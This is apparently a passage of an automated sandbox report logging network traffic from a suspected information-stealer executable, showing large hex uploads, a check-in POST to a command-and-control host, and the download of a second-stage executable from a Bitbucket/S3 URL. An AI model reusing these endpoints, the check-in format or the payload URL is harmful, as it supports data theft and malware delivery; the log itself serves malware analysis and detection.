                                                                                                                                                                              Data Ascii: =pnnnDt~:}tx*vT`Qg+Orifj'}{WV2!,[#/{5S/Fb`:?g}Y>8#_%-j]V.k3]Z#D~8LM IY#3v{fKgm`8U2jKQ:_<mAy#ljx
                                                                                                                                                                              2024-12-23 07:08:51 UTC15331OUTData Raw: 15 3d 47 53 2e 50 87 5d 51 07 f1 5c 05 d0 c5 d2 a8 b2 ad 97 3f 77 cd 26 d2 ea c3 70 e2 b0 93 63 b7 87 9a 45 9f 0c 79 df 38 bf f4 c9 ff dd e4 19 fa e0 e0 85 9f 21 9a 64 5d 35 f4 14 dd 0c 47 71 7d 8c 40 e4 8d de 17 30 fc 48 7c 20 ae 14 88 21 ec 3b 11 3c d8 f2 b6 b5 32 ed 76 cd 4d 9d 2f c0 ca 15 af 99 0f 7d e4 a9 9d 55 be 9c 66 f8 45 26 97 7d f5 0e 81 97 72 ef 7e 6b 62 58 26 9b 3d f7 74 2a 8c 57 92 0c fc e7 f3 cc a7 a8 0b bc 86 d6 dd 5d 33 13 0c 21 a1 30 0b 2c f1 30 2d 8f 95 36 a5 cb 01 62 e8 43 34 2e da d4 ef 0a 5a 88 23 fd 7d a9 1e 5f 68 dd 74 e6 9d b7 72 6a d7 d6 83 0e e2 c4 3e bd cb 3f 11 c0 62 06 b7 04 33 57 48 2a ea 59 be 43 7f e9 aa c9 04 d0 0a 25 45 c7 4a 9f 85 e4 63 2d 86 65 ac c3 4d 1d 80 5f e7 32 1d 75 33 e6 1e 1c 20 48 7f 02 aa 67 75 d6 47 1b 9d
                                                                                                                                                                              Data Ascii: =GS.P]Q\?w&pcEy8!d]5Gq}@0H| !;<2vM/}UfE&}r~kbX&=t*W]3!0,0-6bC4.Z#}_htrj>?b3WH*YC%EJc-eM_2u3 HguG
                                                                                                                                                                              2024-12-23 07:08:51 UTC15331OUTData Raw: 17 eb f7 74 a3 7f 62 9e 1d 37 85 b0 18 3a 31 d8 e0 4f d0 86 66 b4 91 9f 91 a1 ac 7d 7a 31 e4 32 db 8d b8 13 1e 5d ef dd f7 7d 48 02 91 cc 6d e4 94 aa b0 4e 6f 22 37 43 fb 45 3b 1a e7 57 37 03 60 af 92 3b fd cf 13 e2 69 bc 3b 98 30 2f c6 ef 11 de 4a d5 a3 17 6b 4e 4b cf 76 5d a6 19 d2 85 ef 74 16 21 d5 fa 34 36 20 f0 60 cf 68 8e 8e 26 c9 74 a3 70 4a e4 b2 aa 4c 6e 34 6f fb 1f 43 a7 7d cd 90 da 75 a2 e8 7d 11 bd c4 f6 86 7a 5b ce 15 b0 8d df 11 dd b8 75 4a 54 99 55 28 8a b9 4c 6c 2c 78 4a dc 94 d8 27 42 bf 89 0b 9e 03 45 ad c1 08 46 c1 81 f2 ad ad 52 9e 6f 6f 0f 8d b0 52 52 1e 79 d7 bc 47 b2 33 83 8b 4b c3 a2 28 8d 43 c3 cb 72 dc b8 23 49 21 1a 9a 4a 11 d4 69 1e 2f fa bd f9 c1 48 7c f5 f8 bc cf 3e fc 95 ff 47 f1 34 45 51 ff 9f 25 33 00 0d 3f bd 77 40 9c 17
                                                                                                                                                                              Data Ascii: tb7:1Of}z12]}HmNo"7CE;W7`;i;0/JkNKv]t!46 `h&tpJLn4oC}u}z[uJTU(Ll,xJ'BEFRooRRyG3K(Cr#I!Ji/H|>G4EQ%3?w@
                                                                                                                                                                              2024-12-23 07:08:51 UTC15331OUTData Raw: 33 9a 96 eb f5 e3 78 de 7b 1e 50 1e 01 9b 61 41 e4 3e 5a 2d 06 58 05 35 a4 e4 51 55 b3 5b 55 8f 0d 05 0d fc d0 c9 be 63 5e a5 43 00 59 a6 79 af 1a dd 0f 72 c8 1f 90 4d 06 e4 a3 bc a0 f8 11 c6 b7 8f a3 ff 5c 67 de 3d 8f 0f 0c 5d 27 60 aa 6b 7b 68 a1 10 15 82 20 4f 5a de f2 d3 89 64 57 8c 05 44 f7 2b 06 13 10 99 93 81 df ba 2e 14 48 98 b5 f4 4d cd 15 d1 ad f1 71 da 8d d8 57 3d 3f 11 38 3e 75 b0 11 01 c8 65 50 27 7b d6 5d 72 dd 03 fd 84 96 7a aa 7e 5a eb 4f 10 0b a5 60 03 38 b0 ec cc d5 41 3d 72 09 a6 94 a7 1b 11 bd 84 24 f8 ae 22 12 3f 2c 08 31 2d 41 63 d6 bd 83 65 af ee d4 ff 31 d1 30 4f 4b b9 04 9c 53 3f ba b4 3e 83 09 7b 77 cb a5 5b c2 20 a4 93 37 cf 73 c2 82 19 32 6e 87 6f 69 77 28 89 3a 4d e7 83 bc 38 d6 f2 0d be c8 90 a5 25 a9 fd b5 2a 18 ac 10 e6 d7
                                                                                                                                                                              Data Ascii: 3x{PaA>Z-X5QU[Uc^CYyrM\g=]'`k{h OZdWD+.HMqW=?8>ueP'{]rz~ZO`8A=r$"?,1-Ace10OKS?>{w[ 7s2noiw(:M8%*
                                                                                                                                                                              2024-12-23 07:08:51 UTC15331OUTData Raw: f4 86 9a 3c df f8 f4 b1 17 e5 14 64 48 af 40 76 1e 11 75 1f 44 87 89 a7 b5 ee 28 ef bd f6 59 7d 4f f2 b0 95 0b d3 45 74 9e ca fe 5b 31 51 3c ec a6 72 41 a0 c0 e9 5f 68 a4 05 7d 23 c1 70 ae 71 80 52 22 7a f2 94 6d ba a9 d9 c9 18 f7 99 dc 00 a2 20 24 68 0b f4 81 49 6c 81 60 f0 5d 35 6a 86 54 b8 1f f6 72 d7 00 05 47 54 0e bb 8c d2 5c 05 08 e1 a1 38 17 7b b5 fb 1e 62 27 fe 83 f7 bf ab 97 be a4 73 7c ec 17 1c 29 d6 df 09 bb e9 48 d9 c9 7b 1e c5 bc 41 ef 36 b9 d9 fe c5 e3 6d c4 8f 87 a2 86 b7 5b 6d c7 d3 b4 e1 eb a3 58 6b 5c 62 82 97 19 91 40 25 96 f1 f1 c2 cd 84 b9 96 6b c9 6c e4 0c 06 14 0b d8 65 d6 0a 64 91 10 4b 3e 4d 69 11 35 d6 bc bc 29 10 ed f8 e1 95 04 e8 3c 2c 5d 7f e7 e8 e1 ee 2b dc 3f 34 ca da da b5 ae 46 ca 0e 6b 61 87 ad 4f 2a 28 e1 29 54 ec 4f ed
                                                                                                                                                                              Data Ascii: <dH@vuD(Y}OEt[1Q<rA_h}#pqR"zm $hIl`]5jTrGT\8{b's|)H{A6m[mXk\b@%kledK>Mi5)<,]+?4FkaO*()TO
                                                                                                                                                                              2024-12-23 07:08:51 UTC15331OUTData Raw: 51 da d4 74 8d c3 de c9 6b ae dc e1 25 0c dd 00 a4 49 19 75 01 18 f7 50 09 f0 63 5e 30 6a 0e ab d4 03 3d 8b b6 fe 84 70 d3 ce bb a7 0a c9 f7 02 de c9 3b 7f ab 40 1e d7 c1 4d b4 12 69 02 b2 71 c4 82 13 df 35 44 1f 36 fe f1 44 83 40 1e a1 e3 0a ce 6c f4 99 52 d5 c4 c0 0d 06 15 c5 2c 3e a4 7f 1b 03 82 d1 10 08 c1 6e eb 8f 7c d7 82 b7 63 90 c3 58 40 ca 52 4a 3c 0f 0a 24 04 f8 01 61 9d c8 0b e2 53 99 2b 45 30 ea 87 6c 01 38 cd 7a 4f 07 46 14 12 f2 6d a3 6a c3 3d dc c0 1d c1 74 2e 89 87 f5 2c ba c1 f0 51 ee fa 7b b9 08 9c 7b 99 2d 8a 7d 78 e1 c2 0b d2 eb f8 8a 1c 01 70 90 31 f6 24 70 7a b2 ea 0f 89 02 95 9d ef 70 1c 0a f2 83 fd d8 8c 29 1e cc d0 89 f6 6f 0c e3 dd 9d 45 ee df 50 06 48 5c b2 e1 1e 8d 0e 47 2e 20 0a 94 71 b9 af 60 96 0c e7 bf 86 2d d0 8a 63 4f 07
                                                                                                                                                                              Data Ascii: Qtk%IuPc^0j=p;@Miq5D6D@lR,>n|cX@RJ<$aS+E0l8zOFmj=t.,Q{{-}xp1$pzp)oEPH\G. q`-cO
                                                                                                                                                                              2024-12-23 07:08:51 UTC15331OUTData Raw: 73 b6 b8 a7 05 36 10 06 5e 24 92 b9 f1 c1 1a 8f 29 4f e9 80 f4 8d 49 33 eb 1f 68 64 77 7f 15 26 9d a0 e5 fc 8f dd 13 e6 17 1c 81 c9 11 18 c7 56 a6 57 7a 36 78 8b 2c 8b 8b 84 75 ed 2f 7e fc 00 03 07 aa e0 97 91 13 6f 66 ca 66 3f 32 b6 11 41 da f5 13 8c f4 de a8 23 49 f2 ec dc 96 ad 26 45 cf 22 ac 34 b3 3c 7c 57 66 f6 35 ba 1f 45 a3 26 f6 7b 8c 1e 32 6a 8d 7f e3 58 84 db 7b 37 75 aa ae e5 af fa e2 ab 6e c5 6d 11 fc 3c 4f 3f 56 19 86 21 fb f8 83 e6 9e c9 19 cc 46 ad c7 9f 60 86 37 79 a6 76 20 b0 20 64 b8 22 77 c4 75 2d 7f e4 d6 50 17 af 24 36 64 e9 9b 45 99 b9 57 ba 4f c4 94 a9 c9 ef 2e db d6 ab 9d db db ae 35 6c 6f 8b 6b 9f 5e cc 91 61 f9 ac 7a 23 46 3f 04 7a 14 9f 4c 21 50 17 e2 37 de f9 05 a8 87 27 4e 90 14 be 2d 49 40 cc d9 c0 34 4b 12 21 3f 7d d9 c6 d6
                                                                                                                                                                              Data Ascii: s6^$)OI3hdw&VWz6x,u/~off?2A#I&E"4<|Wf5E&{2jX{7unm<O?V!F`7yv d"wu-P$6dEWO.5lok^az#F?zL!P7'N-I@4K!?}
                                                                                                                                                                              2024-12-23 07:08:51 UTC15331OUTData Raw: ed 01 ee fc 5b 12 da a0 be f7 2b c4 3a 80 ac 7f 20 12 2d 34 a3 c1 48 66 83 84 30 29 12 01 5c 74 64 bc e4 f1 c8 9a cb 7d 3b df b5 07 91 c0 fe f1 af 32 ae 2e f3 d7 fe 5e 0d 98 f9 c8 d8 36 1b cf dc 6d a4 78 2f 9d ae 69 66 1e 65 cf 1c 36 35 c2 c8 11 da 05 0b 97 b2 05 de ab 27 26 c4 0d 9a 6d e2 d7 71 7a ce 51 b2 54 77 0b 33 f0 a8 87 fb 77 94 77 9c 29 ac b8 71 a6 26 f4 8e 70 71 18 36 08 f5 33 c7 21 47 5e 5d fe 78 d0 70 e0 8f 27 eb 8b 5f 7d 54 fd f0 cf 9a cd 48 ab 56 09 9b 43 4d 63 6d 1b de 11 fa 18 9a 9b ae 5d b0 dc 70 e0 de 59 91 88 95 4f b2 9b a7 9f ed 3c 2d f4 c7 72 25 50 95 25 bb e7 5c 40 0d a5 48 76 20 dd 1e ef 8c 5e b1 64 db d8 06 df e2 84 fc b8 91 24 a9 2f 2e a8 68 01 47 f1 d8 b8 94 28 c6 13 69 91 65 f1 b5 49 f5 8c e3 bb a3 54 e4 1e 7f 6b 7b 19 32 89 5c
                                                                                                                                                                              Data Ascii: [+: -4Hf0)\td};2.^6mx/ife65'&mqzQTw3ww)q&pq63!G^]xp'_}THVCMcm]pYO<-r%P%\@Hv ^d$/.hG(ieITk{2\
                                                                                                                                                                              2024-12-23 07:08:55 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:08:55 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=mqrsvsf189l7l0hhnre0ptgb6m; expires=Fri, 18 Apr 2025 00:55:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TL2AfXOF1HZD0a4%2B7KfnkdGYn5G1DnfWvTheRq1n2NzgYdqCR76A7NZaInaK%2B%2FICw6ee%2Fk1JsNHZ9umrKGlxDqs7JaTaIT5aETUsPOGXaU7YiAMZkXStwEDl4VarAkihSPw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f6685d6f9382394-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1946&min_rtt=1941&rtt_var=738&sent=342&recv=575&lost=0&retrans=0&sent_bytes=2837&recv_bytes=555448&delivery_rate=1471774&cwnd=252&unsent_bytes=0&cid=9937eda9695b1f06&ts=3703&x=0"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              7192.168.2.1049768172.67.199.724437300C:\Users\user\Desktop\zLP3oiwG1g.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:08:56 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 88
                                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                                              2024-12-23 07:08:56 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 36 35 38 36 34 37 44 42 42 45 39 43 32 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=658647DBBE9C2D86AC8923850305D13E
                                                                                                                                                                              2024-12-23 07:08:57 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:08:57 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=eek73jjfq6gcj3f035sh3s8isd; expires=Fri, 18 Apr 2025 00:55:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2Fk7BokKsL9goPswTtYHJzMElT0Uyb%2FyWTIXoYoCnCkG8Biz%2FhJnQaCDy9Sf8zJF%2BIsBkaJonTdJ3dMVxWVfLaT6l3CZgExsyRUDhXnf4rdN0asIeZGIAZk3GN5T2V07jrA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f6685f7db7843c7-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2173&min_rtt=2164&rtt_var=831&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=987&delivery_rate=1301827&cwnd=211&unsent_bytes=0&cid=58dc079c9d108e79&ts=804&x=0"
                                                                                                                                                                              2024-12-23 07:08:57 UTC198INData Raw: 63 30 0d 0a 77 75 42 73 6d 66 2f 31 62 4b 61 54 6d 4c 4c 6b 54 79 30 43 43 6c 35 44 73 42 75 58 53 70 48 39 73 35 2b 43 41 6a 74 79 5a 6c 57 5a 6d 30 37 73 33 63 39 4f 7a 75 66 73 77 70 64 31 63 53 31 57 63 53 48 5a 62 2f 55 2f 38 70 62 57 36 36 78 74 53 52 55 36 65 71 2b 5a 41 76 79 49 67 67 50 55 2b 4f 76 43 68 53 78 49 4d 7a 68 74 63 49 45 70 79 32 58 69 6e 74 33 37 33 69 31 66 48 52 45 37 72 6f 38 4e 2f 59 79 70 51 2b 44 38 36 74 2b 46 4f 31 6c 72 5a 44 6b 41 32 48 72 6c 49 2b 57 63 30 66 50 6e 4c 46 34 4b 41 33 66 75 77 67 72 74 33 63 39 63 69 72 48 39 6b 4e 35 2b 55 46 38 3d 0d 0a
                                                                                                                                                                              Data Ascii: c0wuBsmf/1bKaTmLLkTy0CCl5DsBuXSpH9s5+CAjtyZlWZm07s3c9Ozufswpd1cS1WcSHZb/U/8pbW66xtSRU6eq+ZAvyIggPU+OvChSxIMzhtcIEpy2Xint373i1fHRE7ro8N/YypQ+D86t+FO1lrZDkA2HrlI+Wc0fPnLF4KA3fuwgrt3c9cirH9kN5+UF8=
                                                                                                                                                                              2024-12-23 07:08:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              8192.168.2.1049774185.166.143.484437300C:\Users\user\Desktop\zLP3oiwG1g.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:08:59 UTC248OUTGET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Host: bitbucket.org
                                                                                                                                                                              2024-12-23 07:08:59 UTC5941INHTTP/1.1 302 Found
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:08:59 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Server: AtlassianEdge
                                                                                                                                                                              Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIFBW6TYB&Signature=PelXt66tJz%2FulrB0cB0%2BaL7%2Bi5E%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQD%2BsOmmZbJoeqQMRgcbUIKewsPYW2aBXNNdnqSZnOjDFwIgR8XEHN13jTNswyI0HHU0LSuyGD%2FTMiS45XjOxzfx2bUqsAII0P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDKLERm7AyKJmGnsaryqEAiz2RQWxEcCBLMIfVp3H4PSzeOX5Dz20ShaLz%2BgE9TIlAJRJj3b2E09svKzFkLddqGwYqC2K%2FKIH%2B43EpJ156iF0t0YnErOxg3PyYWT2PSMugnEx4xgVbJpkrwOS%2BaXe%2FSsC4UOf%2F83UoqmwNPRhKyzztbcDpxLcWerZy9Q6aovVLfMedeL2%2BzfXvbpi8S9915xhF0Cpozy3i0jpnDfou%2FWMrbGZX8d8kbOTHT2AOnqFdwajWkRe0yZY7VqHnS4UnUUU2gtvmzbAh%2B9Byjxps3Oa32XIPpDohq%2Fsd63Twd%2FTpUBNqNyZ3%2BxCnHgqoVCvvdq8kFyXYiW9CTBL2KWz0BWyfxXEMIaYpLsGOp0BYb7jWXl2rvZ6kkWiTN4Lg4p1xTsXw8YInPWUnYT2zjLbcrffJNmSPBWt8S40YM7x5zFblDt5Ez5 [TRUNCATED]
                                                                                                                                                                              Expires: Mon, 23 Dec 2024 07:08:59 GMT
                                                                                                                                                                              Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                              X-Used-Mesh: False
                                                                                                                                                                              Vary: Accept-Language, Origin
                                                                                                                                                                              Content-Language: en
                                                                                                                                                                              X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                              X-Dc-Location: Micros-3
                                                                                                                                                                              X-Served-By: 31a493e5245b
                                                                                                                                                                              X-Version: c9b3998323c0
                                                                                                                                                                              X-Static-Version: c9b3998323c0
                                                                                                                                                                              X-Request-Count: 3349
                                                                                                                                                                              X-Render-Time: 0.049570560455322266
                                                                                                                                                                              X-B3-Traceid: d0e84d860815491bb36291fb9aefc17f
                                                                                                                                                                              X-B3-Spanid: 62990a27855f4dee
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Content-Security-Policy: object-src 'none'; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com b [TRUNCATED]
                                                                                                                                                                              X-Usage-Quota-Remaining: 999042.499
                                                                                                                                                                              X-Usage-Request-Cost: 971.73
                                                                                                                                                                              X-Usage-User-Time: 0.016870
                                                                                                                                                                              X-Usage-System-Time: 0.012282
                                                                                                                                                                              X-Usage-Input-Ops: 0
                                                                                                                                                                              X-Usage-Output-Ops: 0
                                                                                                                                                                              Age: 0
                                                                                                                                                                              X-Cache: MISS
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                              Atl-Traceid: d0e84d860815491bb36291fb9aefc17f
                                                                                                                                                                              Atl-Request-Id: d0e84d86-0815-491b-b362-91fb9aefc17f
                                                                                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                              Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                                              Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                                              Server-Timing: atl-edge;dur=159,atl-edge-internal;dur=3,atl-edge-upstream;dur=157,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                                              Connection: close


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              9192.168.2.104978052.217.67.1004437300C:\Users\user\Desktop\zLP3oiwG1g.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:09:01 UTC1348OUTGET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIFBW6TYB&Signature=PelXt66tJz%2FulrB0cB0%2BaL7%2Bi5E%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQD%2BsOmmZbJoeqQMRgcbUIKewsPYW2aBXNNdnqSZnOjDFwIgR8XEHN13jTNswyI0HHU0LSuyGD%2FTMiS45XjOxzfx2bUqsAII0P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDKLERm7AyKJmGnsaryqEAiz2RQWxEcCBLMIfVp3H4PSzeOX5Dz20ShaLz%2BgE9TIlAJRJj3b2E09svKzFkLddqGwYqC2K%2FKIH%2B43EpJ156iF0t0YnErOxg3PyYWT2PSMugnEx4xgVbJpkrwOS%2BaXe%2FSsC4UOf%2F83UoqmwNPRhKyzztbcDpxLcWerZy9Q6aovVLfMedeL2%2BzfXvbpi8S9915xhF0Cpozy3i0jpnDfou%2FWMrbGZX8d8kbOTHT2AOnqFdwajWkRe0yZY7VqHnS4UnUUU2gtvmzbAh%2B9Byjxps3Oa32XIPpDohq%2Fsd63Twd%2FTpUBNqNyZ3%2BxCnHgqoVCvvdq8kFyXYiW9CTBL2KWz0BWyfxXEMIaYpLsGOp0BYb7jWXl2rvZ6kkWiTN4Lg4p1xTsXw8YInPWUnYT2zjLbcrffJNmSPBWt8S40YM7x5zFblDt5Ez56YqzuxoQvJUGtRwLyEvmWXdiFc4qnFdZ23f1PLTAyj9H [TRUNCATED]
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                              2024-12-23 07:09:02 UTC554INHTTP/1.1 200 OK
                                                                                                                                                                              x-amz-id-2: 6aHVkFXmd5aLR/Djck9KWyOtKprR+CFVqRN64lGIbIkqXyQzhUeOxGMOtacEJSxIfRdjDy+5sFc=
                                                                                                                                                                              x-amz-request-id: 37W66A8QKNHQ75T3
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:09:02 GMT
                                                                                                                                                                              Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                                                              ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                              x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                                                              Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Content-Type: application/x-msdownload
                                                                                                                                                                              Content-Length: 1325507
                                                                                                                                                                              Server: AmazonS3
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-12-23 07:09:02 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00
                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
                                                                                                                                                                              2024-12-23 07:09:02 UTC470INData Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39
                                                                                                                                                                              Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
